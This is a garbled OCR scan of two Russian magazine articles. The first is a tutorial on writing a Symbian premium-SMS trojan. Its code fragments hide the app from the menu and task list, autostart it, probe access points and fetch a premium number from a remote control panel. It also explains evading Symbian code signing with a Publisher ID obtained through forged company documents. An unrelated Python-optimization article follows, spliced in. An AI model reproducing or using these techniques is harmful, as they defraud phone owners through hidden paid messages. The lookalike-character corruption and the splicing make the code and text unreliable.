Ѵ5. Подойдетбазовый шаблон вроде «ЗутЬіап НеЕо 
ѴѴогІб АррИсабоп» (отмечу, что в этой статье нет привязки к 
конкретному 5ПК, поэтому можно использовать любой 5ПК 
для любой платформы). Теперь приступим ксобственно со- 
крытию приложения от глаз пользователя. Чтобы спрятать 
программу, нужно выполнить три простых шага: 

1) Редактируем структуру, содержащую служебную инфор- 
мацию о приложении и именуемую А1Р_П АТА в ЗутЬаіп 
7.Х-8.Х и АРР_РЕ015ТРАТ10М_1МР0 в ЗутЬіап 9.x. Эта струк- 
тура является обычным ресурсом и находится втом файле 
ресурсов, который содержитосновной ЭЮ приложения. 
Необходимо добавить следующую простую запись: 



} 



3) Для БутЬіап 7/8. Добавляем в конструктор класса 
АррПі-приложения свойства окна, скрывающие его от глаз 
пользователя: 



СЕікопЕпѵ: : ЗСаСіс ( ) -> 

КоокШіпО . ЕпаЫеКесеіркОТЕосиз (ЕЕаІзе) ; 
//приложение никогда не может получить фокус 
СЕікопЕпѵ: : ЗСаСіс ( ) -> 

ЕоокШіп ( ) . ЗекОгсііпаІРозікіоп ( -1000 , 
ЕСоеШіпРгіогікуЫеѵегАРЕгопк ) ; 



кісісіеп = КАррІзНісісіеп; 



Флаг попросту скрывает иконку приложения из меню 
аппарата. 

2) В класс документа приложения добавляем определение вир- 



Для ЗутЬіап 9 Проблема в использовании приведенного 
для ЭутЬіап 7/8 кода тут состоит втом, что вызов вто- 
рой статической функции в ЭутЬіап 9 блокируетлюбую 
активность приложения, включая отправку сообщений. 
Поэтому мы ограничиваемся вызовом первой функции и 
переопределяем метод класса САкпѴіеѵѵАррІЛ (от которо- 
го, собственно, и наследуется класс АррЕІі-приложения) 

— НапбІеЕогедгоипбЕѵепіЕ, вызываемого в момент, когда 
приложение получает или теряет фокус: 
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ѵоісі СМедаТгоз' АррІІі : : НапсіІеРогедгоипсіЕѵепРЬ 
(ТВооІ аРогедгоипсі) 

{ 

(аРогедгоипсі) { 
сазе ЕТгие: 

{ 

СЕікопЕпѵ : : ЗРаРіс ( ) ->КооРѴ\[іп ( ) . ЗеРОгсііпаІРозіРіоп 
(О, ЕСоеШіпРгіогіРуЫогтаІ ) ; 

ТАраТазк Разк ( іЕікопЕпѵ->Ѵ\[зЗеззіоп ( ) ) ; 
казк. ЗекШдІсі ( 

СЕікопЕпѵ: : Зкакіс ( ) ->КоокШ1п ( ) . Ісіепкіііег ( ) ) ; 
казк . ЗепсіТоВаскдгоипсі ( ) ; 

} 



Для ЗутЬіап 9. Тут, к счастью, все гораздо проще. Чтобы заставить нашу 
программу запускаться при старте мобилы, нужно проделать вот что: 

1) Создать с^айл ресурсов (*.Г55), называемый по 0103 приложения. В 
частности, если ІЛОЗ 0x12345678, то фаІАп ресурсов называем 12345678. 
Г55. Содержать он будет следующий ресурс: 

#іпс1исіе <зкагкирікет. г1і> 

КЕЗОикСЕ ЗТАКТиР_ІТЕМ_ІЫРО Ыаскіізк 
{ 

ехесикаЫе_пате = " с : \ \зуз\ \Ьіп\ \УоигАрр . ехе " ; 
гесоѵегу = ЕЗкагкирІкетЕхРоІісуЫопе; 

} 



п 

п 

п 



I 



Ьгеак; 

} 

} 

Все, теперь наше приложение при установке благополучно исчезает из 
меню аппарата, Іазк-листа — и даже прячется, если пользователь вдруг 
каким-то образом найдетисполняемый файл в файловой системе и 
попытается запустить его вручную. 

г РЕАЛИЗАЦИЯ МЕХАНИЗМА АВТОСТАРТА 

П рогра м м и рова н ие а втоста рта п ридется рассмотреть отдел ьно для 
ЗутЬіап 7/8 и для ЗутЬіап 9. 

Для ЗутЬіап 7/8. В самой ЗутЬіап 05 до версии 9.x не было явной под- 
держки механизма автостарта, и злые программисты для реализации 
своихтемных планов были вынуждены использовать такназываемые 
гесодпІ2ег5. Весодпігегз изначально являются механизмом для иден- 
тификации МІМЕ-типа конкретного файла, позволяющим, к примеру, 
операционной системе определять, каким приложением открывать и 
редактировать файлы определенного типа. Для управления запуском 
приложений и сохранением данных, основанных на МІМЕ-типах, в 
ЗегіезбО существует подсистема, именуемая Воситепі: Напбіег. Эта под- 
система разработана для корректного сохранения и открытия контента, 
полученного, кпримеру, через ММ5-сообщения, ѴѴАР-закачки, Ыие1:оо1:Ь 
ит.д. Проще говоря, механизм позволяет при открытии картинки из 
аттача сообщений открыть ее именно программой просмотра сооб- 
щений, а не чем-то еще. В ЗегіезбО раз вит та к называемый етЬеббеб 
(аипсЫпд, — то есть, если в приложении Атребуется обработка контента 
потипу, соответствующему приложению В, то приложение А вызывает 
приложение В и передаетему контент. При этом вернуться в приложение 
А можнотолько по факту завершения работы с контентом в В. Примером 
служит открытие в ѴѴЕВ-браузере смартфона ссылки на ]рд-картинку. 

Для просмотра файла запускается Ітаде Ѵіеѵѵег, и только после его за- 
крытия можно вернуться к браузеру. Привязка конкретных приложений к 
конкретным типам осуществляется путем хранения соответствий МІМЕ- 
типовуникальным идентификаторам приложений (ІЛВ). Чтобы помочь 
ЗутЬіап 05 определить, каким приложением нужно открывать файл с 
конкретным разрешением или МІМЕ-типом, и были созданы гесодпігегз. 
По своей сути гесодпігег — это 6Е, имеющая разрешение тбі и сохраня- 
емая в директории с:\5у5І:епп\гесод5 смартфона. При старте смартфона 
ос регистрирует соответствия вида «МІМЕ-тип/ІЛО приложения» путем 
вызова кода гесодпігег’ов. Именно этотфакти можно использовать 
для автостарта приложения. В нашем случае процедура реализации 
автостарта следующая: 

• Создаем гесодпігегдля файлов с расширением *.Ы: (к примеру; расши- 
рение тут вообще не принципиально). 

• В коде инициализации гесодпігег’а, запускаемом при старте смартфо- 
на, прописываем путь кфайлутрояна, который требуется запустить, и, 
собственно, запускаем. 

Процесс довольно сложен для восприятия, но исходники, как обычно, 
прилагаются на диске кжурналу. Здесь мы не будем их приводить из-за 
нехватки места. 



2) В ММР-файл добавляем команду компиляции файла ресурсов: 

ЗТАЕТ ЕЕЗОиКСЕ 1234567 8. гзз 
ТАЕСЕТРАТН \гезоигсе\аррз 
ЕЫВ 

3) В ркд-файл добавляем строку: С : \ЗутЬіап\9 . 1\ЗбО_Згсі_МЕ\ 
ерос32 \ (іака\2\гезоигсе\аррз\12 34 5б7 8 . гзс " - " с : \ргіѵаке\ 
101і875а\ітрогк \ [12 345678] .гзс. В данном случае директория 

с : \ргіѵаке\101і875а\ітрогк является рабочим каталогом, на 
основании содержания которого формируется списокавтоза грузки. 

Мы, фактически, создали хороший и универсальный костякдля практи- 
чески любой полезной софтины под 5утЬіап. Идем дальше. 

Н АВТООПРЕДЕЛЕНИЕ ТОЧКИ ДОСТУПА 

На мой взгляд, это самая сложная часть. Базовая идея реализация меха- 
низма состоит в следующем: 

1 ) Программно получаем список всех сохраненных в настройках 
устройства точек доступа. Среди них будут как 6РВ5-, так и ѴѴАР- и 
ММ 5-точки доступа. При получении списка точек доступа посредс- 
твом класса САр5е[ес1;, который мы будем использовать, можно 
задавать фильтр составления списка, в том числе и по типу точки до- 
ступа (0РР5/ѴѴАР/ММ5). Мы рекомендуем фильтрацию не проводить, 
поскольку принадлежность конкретной точки доступа к конкретному 
типу (с точки зрения САр5е[ес1;) не гарантирует, что через эту точку 
доступа нельзя достучаться до нашего сервера (или что, наоборот, 
можно). 

2) Начинаем перебирать каждую точку доступа из списка, используя 
ее для тестового соединения судаленным есЬо-сервером, отправляю- 
щим клиенту (нашей программе) вточности тотже набор байт, который 
он получил отнего. Проще говоря, пытаемся отправить на эхо-сервис 
байты 0x01 ,0x02 и 0x03 и проверяем, получили ли мы их обратно. Условие 
приема данной комбинации байтявляется необходимым и достаточным 
для идентификации того, что точка доступа можетбыть использована 
для соединения с сервером. В случае любого другого результата — тай- 
маут запроса, кодошибки ит.д. — мы идентифицируем точку доступа как 
нерабочую. 

3) Сохраняем идентификатор полученной рабочей точки доступа и 
используем ее для соединения ссервером. 

Для получения списка точек доступа, какуже отмечалось, используется 
экземпляр класса САр5е[есЕ Его можно сделать членом класса АррОі- 
приложения и вызывать в конструкторе АррІЛ следующий код (будет, 
соответственно, вызываться при старте приложения): 

ССоттзВакаЬазе* соттВЬ = ССогптзВакаЬазе : :Веѵ\?В( 
ЕВакаЬазеТуреІАР) ; 

СІеапирЗкаск : : РизкВ (соттВЬ) ; 

іЗеІеск = САрЗеІеск : :Веѵ^ВС (*соттВЬ, КЕАрІзрТуреАІІ , 
ЕАрВеагегТуреСРЕЗ , КЕАрЗогкВатеАзсепсііпд) ; 
іСоппескіопЕпаЫесі = іЗе1еск->МоѵеТоРігзк ( ) ; 
СІеапирЗкаск: : Рор ( іЗеІеск ) ; 

СІеапирЗкаск : : РорАпсіВезкгоу (согптВЬ) ; //согптВЬ 
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> Ііпкз 

Тема разработки 
шпионского ПО для 
ЗутЬіап раскрыта 
на бирѴ/сІІагазоѵ.ги. 
Также рекомендуется 
регулярно посещать 
Ьгит.покіа.сот. 




> СІѴСІ 

На диске лежат 
исходные коды 
основных классов 
приложения. 



Короткий номер и Ргетіит 8М8 



Думается, ты знаком с механизмом оплаты контента и услуг посредством мобильного телефона, когда для полу- 
чения контента требуется отправить зтз на какой-нибудь короткий номер с определенным текстом. Стоимость 
таких сообщений может варировать от 0,06 до $5. Эти дорогие зтз и называются Ргетіит 5М5. Непосредственно 
короткий номер принадлежит операторам сотовой связи, так что, по идее, вопрос аренды нужно решать с каждым 
оператором отдельно. Дабы сильно не заморачиваться с утрясанием всяких бюрократических вопросов, касающих- 
ся аренды короткого номера, предприимчивые люди обычно пользуются услугами агрегаторов вроде СМС-Трафик 
Оінр: //ѵуѵуѵу.зтзтаШс.ш) . которые берут на себя вопросы заключения договоров со всеми операторами. При этом 
обычно схема взаимодействия с агрегатором примерно следующая: 

1) Заключается договор и доп.соглашения; для этого может понадобиться статус юридического лица (это в случае 
более-менее «приличных» агрегаторов вроде СМС-Трафик, — другие могут деньги и на ѴѴеЬМопеу переводить) . 

2) Заказчику присваивается пара номер/медиа-код. От номера обычно зависит стоимость сообщения, а медиа-код 

— это текст сообщения, который однозначно идентифицирует заказчика. На один номер может быть подвешено 
несколько заказчиков, поэтому, чтобы определить, кому переводить бабло за отправленные юзерами сообщения, 
используется идентификация по медиа-коду. Именно поэтому обычно пишут что-то вроде «отправь 12345 на номер 
1234»; 12345 — это, по сути, идентификатор конкретного арендатора короткого номера. 

3) В конце месяца агрегатор переводит бабло на счет арендатора, оставляя себе процент в качестве комиссии. 
Понятно, что арендовать короткий номер и грести деньги с отправленных на него зтз может любой, и мошенники 

— не исключение. На рынке присутствуют несколько контор, которые позволяют арендовать короткий номер, не 
оставляя о себе приватной информации. 



Здесь мы подсоединяемся к базе данных сопптОВ и создаем списокто- 
чекдоступа. После этого устанавливаем индекс списка на первую пози- 
цию (советую изучитьописание САрЗеіесІ: в 50К). Теперь можнотестиро- 
вать точки доступа. В качестве движка работоспособности точки доступа 
используется модифицированный движокТСР, исходные коды которого 
можно взять на іогит.покіа.сопп . Модификация заключается втом, что 
добавлен класс — оЬзегѵег (МісрірІарСЬескЕпдіпеОЬзегѵег), содержа- 
щий единственный метод ТезіСотріеіесІ, вызываемый движком при ин- 
дикации процесса окончании тестирования конкретной точки доступа. В 
нашем случае от МТсрірІарСЬескЕпдіпеОЬзегѵег наследуется АррІЛ. Мы 
также не публикуем здесь исходный текст движка СІарСЬескТсрЕпдіпе, 
но с ним рекомендуется ознакомиться (есть на нашем диске). Отметим, 
что вся логика использования экземпляра класса СІарСЬескТсрЕпдіпе 
в АррОі заключается в обработке вызова ТезіСотріеіесІ, параметром 
которого как раз и является индикатор успешности или неуспешности 
использования точки доступа. КодТезіСотріеіесІ выглядиттак: 



ѵоісі СМедаТгоуАррІІі : : ТезССотрІеСесі 
(ТІарТезСКезиШ аТезСКезиІС ) 

{ 

ІР (аТезСКезиІС == ЕІарЫоСІІзаЫе) 

{ 

СеСЫехРІарІсі ( ) ; //переходим к тестированию 



МуЗОЕ. После изменения и занесения номера в базу на сервере необхо- 
димо реализовать простенький интерфейс взаимодействия с мобиль- 
ным телефоном. Тут можно пойти разными путями: 

• Просто выводить плейн-текстом номер итекстсообщения при обра- 
щении кстранице вида Ьир://уоигЬо5І:.ги/ппеда5сгірЕрЬр; 

• Можно использоватьХМЕдля поддержки расширяемости. 

В общем, это уже дело вкуса. Главное, корректно обработать отдаваемые 
сервером данные на стороне мобильного приложения. Проще всего снова 
пойти на іогипп.покіа.сопп или пошариться на нашем диске и ознакомиться 
с кодом Ьіір-движка, позволяющего осуществлять ОЕТ-запросы. Исполь- 
зование экземпляра класса движка изАррПі выглядит примерно так: 



іНТТРЕпдіпе->СеЦКедиезСЬ ( іЕгі , іІарІсЗ.) ; 



Здесь іПгі — игіскрипта, возвращающего номер, а ііарісі — идентифика- 
тор точки доступа, которую мы решили использовать. После получения 
ответа от сервера нужно позаботиться о том, чтобы сохранить номер в 
файл или в локальную переменную, и отправить зппз. 



Н МЕХАНИЗМ ОТПРАВКИ 5М5 

Этот функционал уже неоднократно описывался на страницах нашего 
журнала, поэтому либо подними старые номера, либо ознакомься с мате- 
риалами на сайте Ы:І:р://сІІ:ага50ѵ.ги . 
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следующей точки доступа 
} 

еізе 

{ 

НапсіІеСоттапсіЕ (ЕСоппесСТоЗегѵег ) ; 

//ломимся на сервер 

} 

} 

Каквидно, в случаеуспеха, мы коннектимся ксерверу и обновляем номер. 

г КОННЕКТКСЕРВЕРУИЧТЕНИЕНАСТРОЕК 

Чтобы иметь возможностьудаленно задать хакерской софтине номер, 
на который нужно слать недешевое зппз, взломщики реализуют некое 
подобие админки (смотри картинку). 

Проще всего сделать это с использованием стандартной связки РНР + 



В СЕРТИФИКАЦИЯ ПРИЛОЖЕНИЯ 

Какговорилось выше, чтобы приложения могли беспрепятственноус- 
танавливаться в смартфоны под управлением ЗутЬіап 9, необходимо их 
подписывать цифровым сертификатом. Эта мера была введена в рамках 
технологии ЭутЬіап Ріаііогт Эесигііу, появившейся в ЭутЬіап 05 9.1 и 
предназначенной для защиты как раз от подобного софта. Если попы- 
таться вкратце сформулировать суть проблемы, то есть два пути, чтобы 
заставить приложениеустановиться втелефон пользователя: 

ОУзнать ІМЕІ (универсальный идентификатор аппарата) телефонов всех 
пользователей и вручную подготовить сертификатсредствами ЗутЬіап 
ОііііпеЗідпесІ. При этом программа будет уста на вливаться исключительно 
на смартфоны из множества ІМЕІ, указанных при создании сертификата. 

2) Подписать приложение на сайте ЗутЬіап средствами Ехргезз ЗідпесІ 
или СегЬііесІ ЗідпесІ. Отличается Ехргезз ЗідпесІ отСегЬГесІ ЗідпесІ 
тем, что подписьстоит существенно дешевле (20$), атакже натребует 
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подлинность, поэтому их рисуют даже в фотошопе. Вместе с РиЫізЬег Ю 
взломщик получает доступ кЕхргеззЗідпесІ — и возможность сабмитить 
свеженаписанныйтроян на подпись. Здесь шаги следующие: 

1) Софтина заливается на подпись. 

2) Указанная прога автоматически подписывается сертификатом и с 
этого момента может бытьустановлена в любой смартфон. 

3) Хакер быстренько скачиваетсвой зло-софт с сайта ЗутЬіапЗідпеб и 
начинает распространять. 

4) Троян, возможно, попадает на аудит. 

5) Специалисты тестового центра аннулируютсабмит, удаляя подписан- 
ную программу с сайта и блокируют РиЫізЬег 10. 

Даже если пункты 4 и 5 будут иметь место (что совсем не факт], то, в 
любом случае, взломщикуспеетскачать подписанный троян и сможет 
начать его популяризацию. Для распространения заразы РиЫізЬег Ю не 
нужен и, даже если его заблокируют, это уже малоинтересно, ибо делали 
его на подставные документы. Таким вот незаурядным способом обхо- 
дится защита ЗутЬіап РІаІІогт ЗесигТу. Кстати, ты заметил, что во всех 
этих случаях я описываю деятельность некоего «хакера»? Это неспроста, 
поскольку сам я подобными вещами никогда не занимался и тебе не 
советую — мы всего лишьописываемто, каконо случается. Просто будь 
в курсе и знай, что самые современныетехнологии отСимбиан не могут 
защитить твою мобилу на сто процентов. 

Н НАРРУЕМО 

Каквидно, задача написания функционального трояна для ЗутЬіап 
нетакаяужитривиальная, но вполне выполнимая. Сейчасугроза 
безопасности нетакявна в силу относительной сложности описанных 
процедур реализации. Вирусописатели еще неуспели наплодить массу 
получить доступ кфункциям Ехргезз Зідпеб наличного кабинета на сайте опасного ПО. Но со временем они его наплодят, поэтому пользователям 
ЗѵтЫапЗідпеб.сот . мобильныхустройств стоит внимательнее относиться кустанавливае- 

Все, РиЫізЬег Ю получен. Тонким моментом здесь является отправка уч- мому ПО, тем более, из непроверенных источников. Если же читатель 

редител ьских документов юридического лица. Обычно хакеры изыскива- заинтересован в разработке или использовании подобных «продуктов», 
ют возможность отправки каких-нибудь поддельных или чужих докумен- то напоминаем, что это противозаконная деятельность, которая может 
тов. Как показывает практика, уТгизІсепІег нет возможности проверить их привести к печальным последствиям! 



тестирования программы вручную специалистами тестового центра. 
Необходимо просто засабмититьформус информацией о приложении 
и само приложение. Если все сделать правильно, то на выходе получим 
сертифицированное приложение. Тем не менее, потом оно может 
попасть на аудит и сертификация будетаннулирована, если тестерам 
что-то не понравится. СегЬЬеб Зідпеб подразумевает собой тестиро- 
вание вручную специалистами тестового центра. В хакерском случае 
это вообще не вариант — врядли им придетв голову сертифицировать 
трояны! 

Очевидно, что изуказанных способов первый едва ли можетбыть 
применим — хакер просто не сумеетсобрать ІМЕ! всех мобил, в которые 
желает внедриться. Единственный путь — сертификация посредством 
Ехргезз Зідпеб. Все осложняет один факт — для того, чтобы воспользо- 
ваться ЕхргеззЗідпеб, необходимо иметьуниверсальный идентифи- 
катор поставщика услуг РиЫізЬег I В. Стоит он $200 в год и отпускается 
исключительно юридическим лицам, представившим учредительские 
документы в ТгизЮепІег. Подробнее о РиЫізЬег Ю можно прочитать на 
Ыі:р://Ы:агазоѵ.ги . Процедура регистрации РиЫізЬег 10 может вы гл я деть 
примернотак: 

1) Взлом щи к заполняет анкету на ІгизІсепІег.бе/огбег/риЫізЬегіб/беѵ . 
вводит данные кредитки. 

2) На указанный е-таіі приходит письмо с перечнем необходимых 
документов, которые необходимо предоставить для идентификации 
поставщика услуг (разработчика]. 

3) Злодей отправляетсканы документов какого-нибудьлевого юр.лица 
(можно и индивидуального предпринимателя]. 

4) Вышеозначенный гибрид Гитлера и Бармалея получает ссылку на 
сертификат, устанавливающийся в браузер. Он понадобится, чтобы 
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РуіЬоп применяется там, где скорость разраБо^и программы и простота 
сопровождения кода важнее скорости его работы^ Он нужен для быстрого 
создания надежных, легко изменяемых програмЫІ^ ^яаіір даря динамичес- 
кой типизации и большому количеству встроенных высокоуровневых типов 
данных, РуЛоп позволяет быстро создавать лаконичный, выразительный и 
надежный код. У этих достоинств есть и обратная сторона: низкая скорость 
выполнения программ. 



а РуіЬоп пишут не только мелкие скрипты. Этот язык часто 
применяется в крупных проектах — компьютерных играх 
или системах математических расчетов. Если написанная 
программа работает слишком медленно или нетакбыстро, 
какзадумывалось, перед разработчиками встаетзадача повышения 
эффективности кода. Нетрудно догадаться, что статья посвящена обзору 
техник и инструментов оптимизации программ, написанных на Руібоп. 

В МАЛЕНЬКИЕХИТРОСТИ 

Интерпретатор РуіЬоп обладает некоторыми особенностями, которые 
могут влиять на скорость выполнения программ. Знание этих особен- 
ностей поможете написании более эффективного кода. 

Для начала вспомним тот факт, что разработчики интерпретатора всегда 
стараются оптимизировать его работу. Подавляющее большинство 
встроенных функций реализовано на С, поэтому иногда они работают 
быстрее, чем ожидаются. Я советую тщательно изучить стандартную 
библиотеку, и везде, где возможно, использовать ее функции. 



Например, шар (орегаСог . айсі, 11, 12),скореевсего,будетра- 
ботать быстрее, чем шар (ІашЬсІа X, у: х+у, ѵ1 , ѵ2 ). Такой подход 
значительно повышаетчитабельность кода. 

Строки в Руібоп — это неизменяемые объекты (ітппиІаЫе оЬ]ес1;5). Ты не 
можешь изменять значения единожды созданной строки, — можно толь- 
ко создать новую и присвоитьей измененное значение старой. Конкате- 
нация строк ' ' . 3 оіп ( зер) будет выполняться гораздо быстрее, чем 
явный цикл с оператором +=. В первом случае новая строка создается 
один раз и в нее сразу записывается нужноезначение. Во втором — каж- 
дая итерация порождает новый объект, который на следующей итерации 
уже не нужен. Это гораздо медленнее, плюс возрастает нагрузка на 
сборщик мусора. Тоже самое касается оператора «%» для формирования 
строкпо шаблону. Он куда эффективнее прямого суммирования. 

Многие функции, порождающие последовательности, имеют альтер- 
нативную версию, использующую генераторы. Например, при каждом 
вызове гапде(п) в памяти создается списокдлиной п. А вот при 
вызове хгапде (п) в памяти вообще не создается никаких коллекций. 
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только генератор, который вычисляет элементы последовательности 
«ленивым» образом. Помни про депегаіогехргеззіопз, — часто про них 
забывают и пользуются Іізі; сотргебепзіопз. 

Полез но также держать в голове базовые алгоритмы, на которых осно- 
вана работа с коллекциями. Конечно, комфортный синтаксис Руібоп 
усыпляет бдительность, но нужно стараться :]. Словари и множества 
реализованы на деревьях, поэтому, например, при большом N провер- 
ка принадлежности элемента коллекции (а іп Ь) проходит в среднем 
быстрее для словарей и множеств, чем для списков или кортежей, для 
которых в этих случаях выполняется полный перебор. Добавление или 
удаление элементов списка в хвосте выполняется быстрее, чем в сере- 
дине, так как для этого не нужно перестраивать список. 

Из-за динамической природы языка, процедура поиска переменной 
по ее имени выполняется дольше в сравнении с компилируемыми 
языками. Вызов функции — тоже затратная операция, по вышеуказан- 
ным причинам. Вызов метода объекта оЬ].1оо() по сложности сравним 
с поиском элемента в словаре со строковыми ключами. Поиск имен 
происходитбыстрее для локальных, чем для глобальных переменных. 
Какправило, на это не стоитобращать внимания. Но втеле цикла с 
огромным числом итераций стоит пойти на хитрость: по возможности 
вынести какможно больше действий изтела цикла, сделать предвари- 
тельные вычисления. 

Очевидно, что операция импорта — очень медленная, ведь интерпрета- 
тору нужно полностью выполнить весьзапрашиваемый модуль. Обычно 
все операции импорта модулей прописывают в начале скрипта. Но 
бывают случаи, когда модуль используется редко. Тогда можно не указы- 
вать его в начале скрипта, чтобы он не отъедал время при инициализа- 
ции, а написать приблизительно следующее: 

то(іи1е_пате = Ыопе 

(1е^ (іе1ау_ітрогЦ ( ) : 
дІоЬаІ тосіи1е_пате 
і:Е тосіи1е_пате із Ыопе : 
ітрогС то(іи1е_пате 

Модуль тосІи[е_паппе будет импортирован во время вызова функции 
Ое1ау_ітрогС ( ) . 

Оамое главное — расширения на 0. Они могут быть очень эффективны- 
ми. Классический пример — модульЫитРу (реализация на О матриц 
и многомерных массивов, плюс библиотека всего необходимого для 
математических вычислений). По производительности она спокойно 
догоняет коммерческий МаІІаЬ. Нотак как Руібоп гораздо более гибок, 
чем скриптовый языкМа1:ПаЬ,тосвязку МитРу+ Руібоп можно рассмат- 
ривать какоченьудачный ореп-зоигсе проект, который не даетспать по 
ночам жадным капиталистам. Если ты думаешь, что писать Руібоп-рас- 
ш прения на С — долгое и нудное занятие, советую обратить внимание на 
проект РуРех. Это компилируемый язык, похожий на Руібоп. Код на этом 
языке можно смешиватьс кодом Руібоп в одной программе, а писатьс 
его помощью модули расширений почти также просто, каки скрипты на 
самом РуШоп! 

г ПРОФИЛИРОВАНИЕ 

Профайлер — это инструмент для замера времени выполнения раз- 
личныхучастков кода. В Руібоп «из коробки» доступно сразутри вида 
профайлеров (Ьаиегіез іпсіисіесі!). Это модули ргобіе (или сРгобІе), бтеіі: 
и ЬоІзроЕ 

Ноізроі задумывался какэкспериментальная реализация скоростного 
профайлера на С. Высокая производительность на этапе выполнения 
достигалась за счет долгой постобработки данных, собранных во время 
работы. Увы, поддержка этого проекта прекращена и в будущих версиях 
он будет исключен из стандартной библиотеки, поэтому я не буду его 
рассматривать. 

Модуль ргоЛІе позволяет анализировать производительность кода в 
сложных проектах. Он натребует для работы почти никаких изменений 



вуже написанном коде, в применении прости способен выдавать раз- 
нообразную статистику: количество вызовов каждой функций, среднее 
время их работы по отдельности и т.д. Также он позволяеттрассировать 
вызовы функции и выдавать информацию о дереве вызовов. 
Использовать модуль очень просто. В самом заурядном случае доста- 
точно импортировать модуль ргобіе и вызвать ргоТіІе . гип ( ' таіп_ 
ТипсСіоп ( ) ' ) , передав в качестве параметра функцию, с которой 
начинается работа. Ниже приведен более сложный пример использо- 
вания профайлера. Скрипт выводит на консоль табличку для пяти самых 
затратных по времени работы (без учета дочерних вызовов) функций. 
Метод зСгір_сіігз ( ) обрезает полные пути в именах файлов: 

ітрогС ргоТіІе 
ітрогС рзСаСз 

сіеТ таіп ( ) : 

# твоя программа 
разз 

ргоТіІе . гип ( ' таіп ( ) ' , ' таіп_ргоі ' ) 
зСаСз = рзСаСз . ЗСаСз ( ’таіп_ргоі ' ) 
зСаСз . зСгір_(іігз ( ) 
зСаСз . зогЦ_зСаЦз ( ' Сіте ' ) 
зСаСз . ргіпЦ_зСаЦз ( 5 ) 

Сырая статистика, собранная во время данногозапуска, сохраняется в 
файлетаіп_ргоі. Класс зіаіз анализирует информацию, прочитанную 
изтаких файлов, и выдает в более понятном для простых парней виде. 
Разрешается объединять информацию из несколькихтаких файлов 
— для общего анализа информации, собранной за несколько запусков 
(функция зСаСз . айсі ( ) ). 

Модуль сРгоЛІе делаетто же самое, что и модуль ргобіе. Оба модуля 
обладают почти одинаковым интерфейсом и в большинстве случаев 
взаимозаменяемы. Разница втом, что сРгобІе реализован какрасшире- 
ние на языке С, вто время какргобіе написан исключительно средства- 
ми самого Руібоп. Поэтому сРгобІе обладает меньшей погрешностью и 
большей скоростью выполнения, но его сложнее портировать на аль- 
тернативные платформы. Модуль ргобіе, наоборот, теоретически может 
запуститься на любом интерпретаторе РуШоп. 

Модульіітеіі нужен для удобного замера времени работы одиноч- 
ных выражений. Он принимает выражение какстроку, многократно 
выполняетего и выводитобщее время работы. Модуль оченьудобен для 
организации различных экспериментов с замером производительности. 
Рассмотрим небольшой пример: 

ігот СітеіС ітрогС Тітег 

X = 123 

Ц 1 = Тітег ( ' X * 2 ' , ' ігот ^таіп ітрогС х ' ) 

Р2 = Тітег ( ' X + X ' , ' ігот ^таіп ітрогС х ' ) 

питЬег_оі_са11з = 10**7 

Рітеі = РІ . РітеіС (питЬег = питЬег_оі_са11з ) 

Ріте2 = Р2 . РітеіС (питЬег = питЬег_оі_са11з ) 
ргіпР Сітеі / 1ііте2 

В результате, на своей машине я получил 1 .26. Выходит, моя версия 
интерпретатора складывает число с самим собой приблизительно на 1 5- 
20% быстрее, чем умножает это число на 2. Сложение для целых чисел 
выполняется быстрее умножения. 

В лт-компиляция 

Еслиты считаешь, что твой код работает слишком медленно (обя- 
зательно убедись, что это не паранойя!), то неторопись браться за 
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Утилита 6рго1'20о1; позволяет визуализировать выходные данные профайлера в виде графа 



низкоуровневую оптимизацию. Да, я знаю, руки чешутся, но попытайся 
себя перебороть — есть более надежные и простые методы повысить 
производительность. 

Иногда достаточно сделать финтушами: зачем усложнять медленно 
работающий код, если можно просто заменить виртуальную машину, на 
которой он выполняется, на более быструю? Дело в том, что стандартная 
реализация языка (СРуіЬоп) перед выполнением подпрограмм компи- 
лирует их в свое внутреннее представление — байт-код (что-то вроде 
высокоуровневого ассемблера). Это стандартный подход реализации 
интерпретаторов. Он используется при реализации многих другихтех- 



нологий (например, ^аѵа). Интерпретатор компилирует код вызываемых 
функций лишь единожды, при первом вызове. При повторных вызовах 
ему уже не нужно чесать репу над твоими каракулями — он просто поль- 
зуется сохраненным в памяти байт-кодом. 

Но байт-код — это еще не машинные инструкции, которые подаются про- 
цессору. Его тоже нужно интерпретировать! Почему бы не сделать так, 
чтобы выполняемая программа не компилировалась интерпретатором в 
байт-код, а переводилась непосредственно в процессорные команды? 
Такой подход широко используется (например, в .Меі:) и называется ЛТ- 
компиляцией. 
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Еще в 2001 году на РуіЬоп 1 .5 была написана вся логика одного из самых 
кровавых Зб-шутеров — Віабе о1" Оагкпезз, что косвенно подтверждает 
1000®™ производительность. Смотри сам,370тысяч строк кода, исходники 
открыты! 



Сравнение скорости работы разных математических пакетов. Рубпоп + 
Мит Ру работает та к же быстро, каки МаіЕаЬ. Зато чистый Рубпоп — в 
два раза медленнее 

Существует модуль расширения для СРуІбоп, который добавляет 
возможности ЛТ-компиляции в интерпретатор. Имя ему— РзуСо. Для 
инициализации достаточно написать всего три строчки в главном моду- 
ле программы — дальнейшее использование абсолютно прозрачно для 
программиста. Именно поэтому модуль легко включается в уже готовые 
проекты. Рассмотрим вариантего использования. Вставь этот код в на- 
чалосвоего главного модуля, и РзуСо заработает по полной программе: 

ітрогЦ рзусо 
рзусо . :Еи11 ( ) 

:Егот рзусо . сіаззез ітрогС * 

# Текст программы 

Этот модуль обладает более богатыми возможностями для настройки. 
Например, функция ргобІеО позволяет РзуСо произвести ревизию 
имеющихся функций и автоматически определить те, для которых 
оптимизация будет иметь смысл. Для каждой функции производится 
приблизительная оценка отношения производительности с оптимиза- 
цией и без нее. Пользователь можетзадать пороготношения, при кото- 
ром оптимизация будет применяться. Можешь, например, сказать: «Не 
запускай ЛТ-компилятор для функции Іоо, если ожидаемое повышение 
производительности ниже 20%». Кроме этого, РзуСо позволяет задавать 
ограничения на используемую память и вести логсвоей работы. 

В стандартной библиотеке Руібоп есть небольшой скрипт рузіопе.ру, 
тестирующий производительность интерпретатора на базовых опера- 
циях (вызов методов, поиск имен, сравнение строк ит.п). Я попробовал 
сравнить его производительность с РзуСо и без. Так вот, включение 
РзуСо ускоряет работу теста более чем на 450%! Конечно, это синтети- 
ческий тест, в нем просто многократно прогоняется одни итотже метод. 

В реальных проектах РзуСо стабильно дает повышение производитель- 
ности приблизительно на 20% и выше. 

Не всегда дела обстояттак радостно. Ксожалению, РзуСо реализован 
только для і386-совместимых процессоров. Это делает невозможным его 
применение, еслиты пишешьпод какие-то экзотические платформы. 
Если тебе нужен простой способ включать РзуСо, только когда он есть в 
системе, воспользуйся этим кодом: 

і:Е пате == ' таіп ' : 

